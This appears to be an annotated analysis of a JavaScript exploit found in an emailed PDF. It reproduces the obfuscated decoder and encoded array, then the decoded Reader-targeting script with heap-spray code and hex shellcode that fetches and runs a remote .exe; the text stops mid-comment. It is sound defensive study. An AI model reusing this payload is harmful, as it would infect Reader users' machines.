Created
March 20, 2012 22:59
JavaScript PDF exploit found in the wild, 03/20/2012
I got this PDF as an email attachment. | |
The PDF file included a JavaScript block defining an array, and underneath it some HTML-entity-encoded character entries (for example, `&#123;` for `{`) defining the function responsible for decoding and running it. | |
The interesting part of the PDF where the script started: | |
<test:script contentType='application/x-javascript'> | |
That was followed by the array data (not encoded), and then this block: | |
--- snip --- | |
| |
// Decoder stub in the compact form found in the PDF. The integer array `ar` it reads is
// defined outside this snippet (it is listed further down the page).
// Everything here is an implicit global; the code only works in sloppy (non-strict) mode.
// test3 appends one decoded character per call: ar[z] + 4 is an index into the alphabet string cc.
// `if(s)` always passes: s starts as an empty Array (truthy) and is a non-empty string afterwards.
function test3(){if(s)v=ar[z];s=s+cc[v+4];} | |
// Substitution alphabet. ar holds values from -4 upwards, hence the +4 shift in test3.
cc={q:"var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q; | |
// Indices 2, 5, 6 and 8 of this string are 'e', 'v', 'a', 'l': the word "eval" is assembled
// at run time so the literal token never appears in the file (defeats plain keyword matching).
qq='ghej4vabl'; | |
q=qq[2]+qq[5]+qq[6]; | |
q=q+qq[8]; | |
// The object-literal wrapping is noise: b is simply `this` (the global object at top level).
b={v:{q:{x:this}}}.v.q.x; | |
// w = this['eval'], i.e. a reference to eval obtained by property lookup.
w={v:b[q]}.v; | |
// Output accumulator; Array() + string coerces to a string on the first append.
s=Array(); | |
// Alias of cc; not read again in this snippet.
n={v:cc}.v; | |
// `i-3754<0` is an obfuscated `i<3754`: one pass per array element used.
for(i=0;i-3754<0;i++){ | |
z=i; | |
test3(); | |
} | |
// Executes the decoded text through eval. This is the call the analysis copy later on the page disables.
w(s); | |
--- snip --- | |
Here is the "obfuscated" exploit script, as found in the PDF (with linebreaks removed from the array): | |
<script> | |
ar=[-4, -3, -2, -1, 0, -3, 1, 1, 2, 3, 4, 5, -4, -3, -2, -1, 6, 6, 6, 7, -1, 8, 8, 8, 7, -1, 1, 1, 1, 7, -1, 9, 9, 9, 7, -1, 10, 10, 10, 7, -1, 4, 4, 4, 7, -1, 11, 11, 11, 5, -4, -3, -2, -1, 0, 12, 2, 3, 13, 9, -2, 14, 15, -3, 7, -1, 2, 5, -4, -3, -2, -1, 16, -1, 17, -1, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, -4, -3, -2, -1, 20, -1, 17, -1, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, -4, -3, -2, -1, 15, 23, 24, 17, 25, 26, 8, 27, 28, 29, 28, 28, 10, 28, 30, 24, 31, 32, 28, 26, -3, 33, 8, 27, 28, 29, 28, 28, 10, 28, 10, 29, 33, 32, 28, 26, -3, -3, 33, 9, 6, 32, 28, 26, -3, 33, 28, 27, 28, 32, 27, 26, -3, 29, 9, 27, 10, 32, 28, 26, -3, 26, 24, 26, 24, 26, 24, 26, 24, 27, 29, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 24, 27, 33, 34, 32, 28, 26, -3, 29, 26, 27, 28, 29, 28, 28, 10, 28, 28, 28, 26, 28, 28, 28, 28, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 29, 29, 32, 33, 9, 26, 10, 8, 10, 8, 32, 30, 9, 26, 31, 30, 33, 26, 9, 34, 30, 10, 33, 33, 8, 28, 29, 26, 32, 6, 26, 28, 33, 28, 32, 6, 26, 28, 28, 8, 32, 6, 31, 28, 24, 8, 30, 29, 32, 6, 31, 29, 28, 32, 33, 33, 1, 6, 29, 29, 32, 6, 30, 9, 33, 8, 28, 33, 31, 26, 33, 33, 27, 8, 32, 24, 9, 9, 24, 30, 24, 28, 10, 10, 10, 10, 6, 32, 32, 6, 26, 28, 33, 28, 8, 33, 26, 29, 33, 34, 28, 29, 31, 30, 10, 6, 32, 31, 33, 26, 27, 26, 32, 30, 9, 26, 31, 30, 30, 24, 9, 34, 9, 6, 26, 8, 30, 24, 30, 29, 32, 6, 31, 30, 33, 8, 32, 6, 31, 26, 33, 30, 31, 32, 28, 33, 10, 30, 30, 29, 32, 6, 31, 29, 27, 28, 28, 33, 10, 30, 33, 33, 8, 34, 26, 34, 26, 24, 10, 8, -3, 1, 28, 33, 8, 30, 33, 33, 1, 6, 28, 10, 6, 9, 24, 28, 33, 32, 10, 27, 31, 26, 28, 32, 8, 24, 8, 6, 28, 1, 28, 33, 1, -3, 26, 28, 9, 6, 10, 24, 33, 6, 24, 10, 31, 30, 9, 29, 30, 9, 32, 6, 30, 9, 27, 26, 28, 33, 1, 1, 29, 29, 32, 6, 28, 8, 26, 6, 32, 1, 26, 29, 9, 8, 10, 10, 30, 26, 27, 26, 28, 8, 32, 6, 1, 32, 28, 33, 1, 1, 32, 6, 28, 26, 32, 6, 28, 33, 8, 30, -3, 6, 30, 9, 30, 
34, 8, 33, 9, 6, 30, 33, -3, 1, 32, 6, 29, 32, 27, 28, 32, 28, 31, 1, 28, 8, 33, 33, 31, 26, 28, 33, 34, 29, 9, 6, 10, 33, 32, 6, 29, 32, 28, 32, 32, 6, 10, 31, 29, -3, 28, 30, 30, 34, 9, 32, 34, 32, 10, 10, 10, 10, 10, 10, 9, 27, 10, 34, 9, 32, 28, 28, 28, 28, 28, 28, 28, 28, 30, 32, 30, 28, 29, -3, 26, 28, 29, 32, 10, 10, 28, 28, 28, 28, 28, 28, 30, 28, 32, 33, 8, 28, 24, 34, 30, 28, 30, 30, 32, 6, 9, 8, 32, 6, 30, 9, 24, 28, 32, 33, 8, 33, 28, 30, 10, 10, 9, 33, 29, 32, 29, 10, 29, 9, 28, 28, 28, 28, 29, 32, 31, 30, 31, 27, 29, 8, 29, 1, 30, 26, 10, 10, 24, 29, 32, 33, 8, 26, 28, 32, 32, 6, 9, 32, 9, 32, 29, 24, 10, 10, 10, 10, 10, 10, 9, 6, 28, 27, 9, 6, 31, 27, 32, 24, 9, 8, 28, 26, 28, 24, 28, 28, 28, 28, 32, 1, 30, 8, 27, 26, 28, 8, 8, 31, 28, 26, 27, 26, 31, 27, 29, 30, 29, 31, 31, 33, 8, 31, 26, 26, 27, 26, 28, 26, 31, 29, 31, 27, 33, 33, 33, 27, 8, 31, 26, 26, 27, 26, 28, 32, 27, 28, 27, 1, 31, 33, 27, 28, 30, 33, 29, 32, 10, 32, 28, 28, 28, 28, 28, 28, 10, 10, 30, 29, 28, 8, 32, 6, 9, 32, 33, 33, 8, 34, 30, 24, 8, 31, 26, 26, 24, 1, 28, 28, 31, 31, 31, 28, 29, 27, 31, 26, 8, 31, 26, 26, 24, 1, 28, 30, 27, 9, 29, 26, 29, 8, 29, 8, 8, 29, 26, 26, 24, 1, 28, 34, 28, 28, 30, 34, 32, -3, 8, 24, 28, 26, 33, 28, 32, 32, 26, 26, 24, 1, 28, 26, 26, 24, 30, 24, 29, -3, 28, 28, 29, -3, 28, 28, 30, 33, 30, 31, 29, -3, 28, 28, 10, 10, 30, 29, 24, 26, 32, 30, 8, 28, 31, 30, 24, 29, 29, -3, 28, 28, 30, 33, 10, 10, 30, 29, 28, 26, 29, -3, 28, 28, 32, 33, 9, 6, 28, 8, 30, 33, 10, 10, 30, 29, 28, 26, 32, 33, 8, 33, 28, 8, 9, 6, 28, 27, 9, 6, 24, 33, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 10, -3, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 8, 26, 29, -3, 28, 28, 29, -3, 10, 9, 10, 10, 30, 29, 28, 32, 9, 32, 34, 8, 10, 9, 10, 10, 10, 10, 32, 9, 26, 9, 28, 9, 9, 8, 34, 32, 10, 9, 32, -3, 28, 9, 32, 34, 29, 10, 28, 24, 6, 1, 33, 33, 8, -3, 32, -3, 30, 6, 24, 6, 8, 29, 26, 29, 31, 34, 33, 29, 24, -3, 27, 10, 31, 28, 29, 32, 31, 26, 31, 26, 31, 28, 33, -3, 27, 10, 27, 10, 29, 24, 
31, 26, 31, 26, 29, 34, 31, 26, 31, 30, 29, 26, 29, 30, 27, 1, 31, 26, 29, 30, 29, 30, 31, 33, 27, 9, 29, 33, 29, 10, 29, 1, 27, 10, 29, 34, 29, 1, 29, 24, 29, 31, 29, 30, 31, 33, 27, 10, 33, 24, 27, 9, 29, 30, 31, 32, 29, 30, 28, 28, 28, 28, 25, 5, -4, -3, -2, -1, 15, 23, 27, 17, 25, 26, 8, 27, 28, 29, 28, 28, 10, -3, 30, 29, 33, 32, 28, 26, -3, 33, 8, 27, 28, 29, 28, 28, 10, 34, 29, 27, 24, 32, 28, 26, -3, 34, 28, 24, 10, 32, 28, 26, -3, 33, 28, 34, 28, 32, 26, 26, -3, 31, 1, 31, 9, 32, 28, 26, -3, 26, 24, 26, 24, 26, 24, 26, 24, 27, 29, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 31, 24, 32, 32, 32, 28, 26, -3, 29, 26, 27, 28, 29, 28, 28, 10, 28, 28, 28, 26, 28, 28, 28, 28, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 29, 29, 32, 33, 9, 26, 10, 8, 10, 8, 32, 30, 9, 26, 31, 30, 33, 26, 9, 34, 30, 10, 33, 33, 8, 28, 29, 26, 32, 6, 26, 28, 33, 28, 32, 6, 26, 28, 28, 8, 32, 6, 31, 28, 24, 8, 30, 29, 32, 6, 31, 29, 28, 32, 33, 33, 1, 6, 29, 29, 32, 6, 30, 9, 33, 8, 28, 33, 31, 26, 33, 33, 27, 8, 32, 24, 9, 9, 24, 30, 24, 28, 10, 10, 10, 10, 6, 32, 32, 6, 26, 28, 33, 28, 8, 33, 26, 29, 33, 34, 28, 29, 31, 30, 10, 6, 32, 31, 33, 26, 27, 26, 32, 30, 9, 26, 31, 30, 30, 24, 9, 34, 9, 6, 26, 8, 30, 24, 30, 29, 32, 6, 31, 30, 33, 8, 32, 6, 31, 26, 33, 30, 31, 32, 28, 33, 10, 30, 30, 29, 32, 6, 31, 29, 27, 28, 28, 33, 10, 30, 33, 33, 8, 34, 26, 34, 26, 24, 10, 8, -3, 1, 28, 33, 8, 30, 33, 33, 1, 6, 28, 10, 6, 9, 24, 28, 33, 32, 10, 27, 31, 26, 28, 32, 8, 24, 8, 6, 28, 1, 28, 33, 1, -3, 26, 28, 9, 6, 10, 24, 33, 6, 24, 10, 31, 30, 9, 29, 30, 9, 32, 6, 30, 9, 27, 26, 28, 33, 1, 1, 29, 29, 32, 6, 28, 8, 26, 6, 32, 1, 26, 29, 9, 8, 10, 10, 30, 26, 27, 26, 28, 8, 32, 6, 1, 32, 28, 33, 1, 1, 32, 6, 28, 26, 32, 6, 28, 33, 8, 30, -3, 6, 30, 9, 30, 34, 8, 33, 9, 6, 30, 33, -3, 1, 32, 6, 29, 32, 27, 28, 32, 28, 31, 1, 28, 8, 33, 33, 31, 26, 28, 33, 34, 29, 9, 6, 10, 33, 32, 6, 29, 32, 28, 
32, 32, 6, 10, 31, 29, -3, 28, 30, 30, 34, 9, 32, 34, 32, 10, 10, 10, 10, 10, 10, 9, 27, 10, 34, 9, 32, 28, 28, 28, 28, 28, 28, 28, 28, 30, 32, 30, 28, 29, -3, 26, 28, 29, 32, 10, 10, 28, 28, 28, 28, 28, 28, 30, 28, 32, 33, 8, 28, 24, 34, 30, 28, 30, 30, 32, 6, 9, 8, 32, 6, 30, 9, 24, 28, 32, 33, 8, 33, 28, 30, 10, 10, 9, 33, 29, 32, 29, 10, 29, 9, 28, 28, 28, 28, 29, 32, 31, 30, 31, 27, 29, 8, 29, 1, 30, 26, 10, 10, 24, 29, 32, 33, 8, 26, 28, 32, 32, 6, 9, 32, 9, 32, 29, 24, 10, 10, 10, 10, 10, 10, 9, 6, 28, 27, 9, 6, 31, 27, 32, 24, 9, 8, 28, 26, 28, 24, 28, 28, 28, 28, 32, 1, 30, 8, 27, 26, 28, 8, 8, 31, 28, 26, 27, 26, 31, 27, 29, 30, 29, 31, 31, 33, 8, 31, 26, 26, 27, 26, 28, 26, 31, 29, 31, 27, 33, 33, 33, 27, 8, 31, 26, 26, 27, 26, 28, 32, 27, 28, 27, 1, 31, 33, 27, 28, 30, 33, 29, 32, 10, 32, 28, 28, 28, 28, 28, 28, 10, 10, 30, 29, 28, 8, 32, 6, 9, 32, 33, 33, 8, 34, 30, 24, 8, 31, 26, 26, 24, 1, 28, 28, 31, 31, 31, 28, 29, 27, 31, 26, 8, 31, 26, 26, 24, 1, 28, 30, 27, 9, 29, 26, 29, 8, 29, 8, 8, 29, 26, 26, 24, 1, 28, 34, 28, 28, 30, 34, 32, -3, 8, 24, 28, 26, 33, 28, 32, 32, 26, 26, 24, 1, 28, 26, 26, 24, 30, 24, 29, -3, 28, 28, 29, -3, 28, 28, 30, 33, 30, 31, 29, -3, 28, 28, 10, 10, 30, 29, 24, 26, 32, 30, 8, 28, 31, 30, 24, 29, 29, -3, 28, 28, 30, 33, 10, 10, 30, 29, 28, 26, 29, -3, 28, 28, 32, 33, 9, 6, 28, 8, 30, 33, 10, 10, 30, 29, 28, 26, 32, 33, 8, 33, 28, 8, 9, 6, 28, 27, 9, 6, 24, 33, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 10, -3, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 8, 26, 29, -3, 28, 28, 29, -3, 10, 9, 10, 10, 30, 29, 28, 32, 9, 32, 34, 8, 10, 9, 10, 10, 10, 10, 32, 9, 26, 9, 28, 9, 9, 8, 34, 32, 10, 9, 32, -3, 28, 9, 32, 34, 29, 10, 28, 24, 6, 1, 33, 33, 8, -3, 32, -3, 30, 6, 24, 6, 8, 29, 26, 29, 31, 34, 33, 29, 24, -3, 27, 10, 31, 28, 29, 32, 31, 26, 31, 26, 31, 28, 33, -3, 27, 10, 27, 10, 29, 24, 31, 26, 31, 26, 29, 34, 31, 26, 31, 30, 29, 26, 29, 30, 27, 1, 31, 26, 29, 30, 29, 30, 31, 33, 27, 9, 29, 33, 29, 10, 29, 1, 27, 10, 29, 34, 
29, 1, 29, 24, 29, 31, 29, 30, 31, 33, 27, 10, 33, 24, 27, 9, 29, 30, 31, 32, 29, 30, 28, 28, 28, 28, 25, 5, 15, 23, 33, 17, -3, 0, 0, 5, 15, 23, 26, 17, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 23, 30, 21, 22, 36, -4, -3, -2, -1, 15, 23, 29, 17, 15, 23, 33, 37, -4, 2, 9, 18, 9, -2, 38, 9, -2, 14, 2, 12, 3, 37, 13, 12, 39, 13, -2, 2, 3, 4, 21, 22, 5, 15, 23, 29, 17, 15, 23, 29, 37, -2, 9, 0, 23, -3, 8, 9, 21, 40, 37, 40, 7, 40, 40, 22, 5, 18, 11, 2, 23, 9, 21, 15, 23, 29, 37, 23, 9, 3, 4, 13, 11, 41, 26, 22, 15, 23, 29, 42, 17, 40, 28, 40, 5, -2, 9, 13, 35, -2, 3, -1, 0, -3, -2, 14, 9, 43, 3, 13, 21, 15, 23, 29, 7, 24, 28, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 23, 31, 21, 15, 23, 32, 7, 15, 23, 34, 22, 36, 18, 11, 2, 23, 9, 21, 15, 23, 32, 37, 23, 9, 3, 4, 13, 11, 45, 27, 41, 15, 23, 34, 22, 15, 23, 32, 42, 17, 15, 23, 32, 5, -2, 9, 13, 35, -2, 3, -1, 15, 23, 32, 37, 14, 35, 6, 14, 13, -2, 2, 3, 4, 21, 28, 7, 15, 23, 34, 46, 27, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 28, 21, 15, 43, 24, 22, 36, 15, 43, 24, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 15, 43, 24, 22, 5, -2, 12, 13, 9, 47, -3, 48, 17, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 45, 27, 5, 1, -3, 48, 49, 12, 13, 9, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 40, 50, 35, 34, 28, 34, 28, 40, 22, 5, 14, 0, -2, -3, 20, 17, 15, 23, 31, 21, 1, -3, 48, 49, 12, 13, 9, 7, 28, 16, 27, 28, 28, 28, 51, -2, 12, 13, 9, 47, -3, 48, 22, 5, 23, 12, 16, 52, 11, 9, 9, 17, 15, 43, 24, 42, 14, 0, -2, -3, 20, 5, 23, 12, 16, 52, 11, 9, 9, 17, 15, 23, 31, 21, 23, 12, 16, 52, 11, 9, 9, 7, 30, 27, 26, 28, 34, 32, 22, 5, 10, 12, -2, 21, 2, 17, 28, 5, -1, 2, -1, 41, -1, 26, 28, 28, 5, -1, 2, 42, 42, 22, 15, 23, 26, 53, 2, 54, 17, 23, 12, 16, 52, 11, 9, 9, 37, 14, 35, 6, 14, 13, -2, 21, 28, 7, 23, 12, 16, 52, 11, 9, 9, 37, 23, 9, 3, 4, 13, 11, 51, 24, 22, 42, 1, -3, 48, 49, 12, 13, 9, 5, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 27, 21, 15, 43, 24, 7, 23, 9, 3, 22, 36, 18, 11, 2, 23, 9, 21, 15, 43, 
24, 37, 23, 9, 3, 4, 13, 11, 41, 23, 9, 3, 22, 15, 43, 24, 42, 17, 15, 43, 24, 5, -2, 9, 13, 35, -2, 3, -1, 15, 43, 24, 37, 14, 35, 6, 14, 13, -2, 2, 3, 4, 21, 28, 7, 23, 9, 3, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 33, 21, 15, 43, 24, 22, 36, -2, 9, 13, 17, 40, 40, 5, 10, 12, -2, 21, 2, 17, 28, 5, 2, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 2, 42, 17, 27, 22, 36, 6, 17, 15, 43, 24, 37, 14, 35, 6, 14, 13, -2, 21, 2, 7, 27, 22, 5, 8, 17, 0, -3, -2, 14, 9, 43, 3, 13, 21, 6, 7, 24, 29, 22, 5, -2, 9, 13, 42, 17, 39, 13, -2, 2, 3, 4, 37, 10, -2, 12, 55, 56, 11, -3, -2, 56, 12, 1, 9, 21, 8, 22, 5, 44, -2, 9, 13, 35, -2, 3, -1, -2, 9, 13, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 2, 24, 21, 15, 43, 24, 7, 15, 43, 26, 22, 36, 15, 43, 30, 17, 40, 40, 5, 10, 12, -2, 21, 15, 43, 29, 17, 28, 5, 15, 43, 29, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 29, 42, 42, 22, 36, 15, 23, 34, 17, 15, 43, 26, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 31, 17, 15, 43, 24, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 22, 5, 15, 43, 32, 17, 15, 43, 26, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 50, 15, 23, 34, 22, 5, 15, 43, 30, 42, 17, 39, 13, -2, 2, 3, 4, 37, 10, -2, 12, 55, 56, 11, -3, -2, 56, 12, 1, 9, 21, 15, 43, 31, 58, 15, 43, 32, 22, 5, 44, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 34, 21, 15, 43, 29, 22, 36, 15, 57, 28, 17, 15, 43, 29, 37, 13, 12, 39, 13, -2, 2, 3, 4, 21, 24, 29, 22, 5, 15, 57, 24, 17, 15, 57, 28, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 30, 17, 21, 15, 57, 24, 50, 27, 22, 59, 40, 28, 40, 42, 15, 57, 28, 60, 15, 57, 28, 5, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 27, 21, 15, 43, 24, 22, 36, 15, 43, 30, 17, 40, 40, 5, 10, 12, -2, 21, 15, 43, 29, 17, 28, 5, 15, 43, 29, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 29, 42, 17, 27, 22, 36, 15, 43, 30, 42, 17, 40, 50, 35, 40, 5, 15, 43, 30, 42, 17, 15, 43, 34, 21, 15, 43, 24, 37, 8, 11, -3, -2, 56, 
12, 1, 9, 19, 13, 21, 15, 43, 29, 42, 24, 22, 22, 5, 15, 43, 30, 42, 17, 15, 43, 34, 21, 15, 43, 24, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 22, 22, 44, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 33, 21, 22, 36, 15, 57, 26, 17, 15, 23, 30, 21, 22, 5, 2, 10, 21, 15, 57, 26, 41, 34, 28, 28, 28, 22, 36, 15, 57, 30, 17, 40, 12, 42, 35, 19, 39, 57, 4, 4, 4, 48, 0, 35, 61, 26, 62, 63, 46, 46, 46, 46, 46, 18, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 64, 19, 19, 19, 19, 19, 19, 19, 19, 10, 11, -3, 19, 39, 2, 19, 4, 65, 19, 34, 32, 66, 43, 62, 63, 40, 5, 15, 57, 29, 17, 15, 23, 24, 5, 15, 57, 31, 17, 15, 43, 33, 21, 15, 57, 29, 22, 44, 9, 23, 14, 9, 36, 15, 57, 30, 17, 40, 48, 62, 42, 19, 39, 57, 2, 64, 11, 66, 0, 34, 10, 12, 62, 63, 46, 46, 46, 46, 46, 18, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 64, 19, 19, 19, 19, 19, 19, 19, 19, 65, 16, 56, 19, 39, 2, 19, 4, 65, 19, 46, 10, 66, 26, 62, 63, 40, 5, 15, 57, 29, 17, 15, 23, 27, 5, 15, 57, 31, 17, 15, 43, 33, 21, 15, 57, 29, 22, 44, 15, 57, 32, 17, 40, 39, 67, 48, 68, 19, 47, 4, 4, 19, 19, 62, 62, 40, 5, 15, 57, 34, 17, 15, 43, 27, 21, 40, 64, 67, 69, 62, 40, 7, 24, 28, 34, 32, 26, 22, 5, 15, 23, 23, 28, 17, 40, 64, 64, 8, 19, 19, 19, 66, 47, 19, 19, 66, 19, 19, 19, 19, 18, 43, 19, 19, 19, 19, 64, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 18, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 62, 4, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 66, 64, 66, 66, 19, 19, 66, 19, 19, 19, 19, 43, 19, 19, 19, 19, 69, 18, 66, 66, 19, 19, 66, 19, 19, 19, 19, 18, 43, 19, 19, 19, 67, 19, 66, 47, 19, 70, 18, 19, 19, 19, 56, 39, 43, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 70, 47, 19, 57, 46, 46, 46, 46, 46, 40, 5, 15, 23, 23, 24, 17, 15, 57, 32, 42, 15, 57, 34, 42, 15, 23, 23, 28, 42, 15, 57, 30, 5, 15, 23, 23, 27, 17, 15, 57, 2, 24, 21, 15, 57, 31, 7, 40, 40, 22, 5, 2, 10, 21, 15, 23, 23, 27, 
37, 23, 9, 3, 4, 13, 11, 50, 27, 22, 15, 23, 23, 27, 42, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 40, 50, 28, 28, 40, 22, 5, 15, 23, 23, 33, 17, 15, 57, 27, 21, 15, 23, 23, 27, 22, 5, 18, 2, 13, 11, 21, 36, 48, 60, 15, 23, 23, 33, 44, 22, 15, 43, 28, 21, 48, 22, 5, 68, 18, 9, 24, 27, 33, 6, 37, -2, -3, 18, 38, -3, 23, 35, 9, 17, 15, 23, 23, 24, 44, 15, 57, 33, 21, 22, 5]; | |
// Appends one decoded character to the global string s.
// Reads globals z (current position), ar (encoded integers) and cc (alphabet string);
// writes globals v and s. The +4 shift maps ar's values, which start at -4, onto cc's indices.
function test3() { | |
// Always true in practice: s is an empty Array (truthy) on the first call and a non-empty string after it.
if (s) v = ar[z]; | |
s = s + cc[v + 4]; | |
} | |
// Driver for the decoder, reformatted for reading. All names are implicit globals (sloppy mode only).
// Substitution alphabet indexed by test3; wrapping it in an object literal is obfuscation noise.
cc = { | |
q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM" | |
}.q; | |
// Characters 2, 5, 6 and 8 of this string spell "eval"; building the name at run time keeps
// the literal token out of the file, so signature matching on the word alone will miss it.
qq = 'ghej4vabl'; | |
q = qq[2] + qq[5] + qq[6]; | |
q = q + qq[8]; | |
// b is just `this` (the global object when run at top level).
b = { | |
v: { | |
q: { | |
x: this | |
} | |
} | |
}.v.q.x; | |
// w = this['eval']: a reference to eval obtained by property lookup.
w = { | |
v: b[q] | |
}.v; | |
// Output accumulator; becomes a string on the first `s + ...` in test3.
s = Array(); | |
// Alias of cc; not read again in the visible code.
n = { | |
v: cc | |
}.v; | |
// `i - 3754 < 0` is an obfuscated `i < 3754`; each pass decodes one element of ar.
for (i = 0; i - 3754 < 0; i++) { | |
z = i; | |
test3(); | |
} | |
// Analysis substitution: print the decoded script instead of executing it.
console.log(s); | |
// w is eval (resolved above as this['eval']); the sample called w(s) at this point to run the decoded text.
// Deliberately left disabled in this analysis copy; keep it disabled outside an isolated sandbox.
// w(s);
</script> | |
... Running this code with the eval call replaced by a log statement produces the "decrypted" script below, which presumably targets a version of Adobe Reader (it reads `app.viewerVersion`). I'm pretty sure you wouldn't want to run this in that environment. | |
// Globals declared by the decoded script. Apart from `i` (used as a loop counter by later
// functions), none of these names is referenced again in the visible listing; they look like
// leftover or decoy declarations.
var padding; | |
var bbb, ccc, ddd, eee, fff, ggg, hhh; | |
var pointers_a, i; | |
var x = new Array(); | |
var y = new Array(); | |
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f61747469747564652d746565732e636f6d2f696d616765732f312e6578650000'; | |
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f61747469747564652d746565732e636f6d2f696d616765732f312e6578650000'; | |
// `app` is the application object of the Acrobat/Reader JavaScript host; it is undefined in a
// browser or Node, so this script only gets past this line inside a PDF viewer.
_l3 = app; | |
// Filled by _I0 with 400 large strings (the sprayed blocks).
_l4 = new Array(); | |
// Returns the viewer version as a four-digit integer for the version gate in _j3.
// Constructed example: a viewerVersion of 9.3 becomes "93", then "9300", then 9300.
function _l5() { | |
var _l6 = _l3.viewerVersion.toString(); | |
// A string pattern replaces only the first '.', which is enough for "major.minor".
_l6 = _l6.replace('.', ''); | |
// Right-pad with zeros to at least four digits.
while (_l6.length < 4) _l6 += '0'; | |
return parseInt(_l6, 10) | |
} | |
// Repeats the string _l8 (by doubling) and returns its first _l9 / 2 characters.
// The *2 and /2 suggest _l9 is a size in bytes at two bytes per character (inferred from the arithmetic).
function _l7(_l8, _l9) { | |
while (_l8.length * 2 < _l9) _l8 += _l8; | |
return _l8.substring(0, _l9 / 2) | |
} | |
// Heap-spray routine: fills the global array _l4 with 400 large strings built from the payload
// plus filler. _I1 is a %uXXXX-escaped payload string (produced by _j2 in the visible caller).
// Detection note: unescape('%u9090') filler combined with hundreds of ~512 KB strings stored in
